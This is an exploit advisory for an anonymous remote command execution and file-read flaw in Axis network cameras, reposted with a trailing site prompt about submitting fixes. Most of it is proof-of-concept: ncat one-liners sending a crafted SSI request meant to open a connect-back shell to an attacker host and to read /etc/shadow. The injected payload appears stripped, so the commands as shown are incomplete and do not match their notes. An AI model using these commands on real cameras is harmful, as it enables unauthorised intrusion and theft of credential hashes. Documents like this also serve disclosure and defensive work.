Axis SSI - Remote Command Execution / Read Files

2017-10-20 12:05:11

[STX]

Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)

Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configure to allow anonymous view

Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr= HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT


Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr= HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT

[ETX]

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.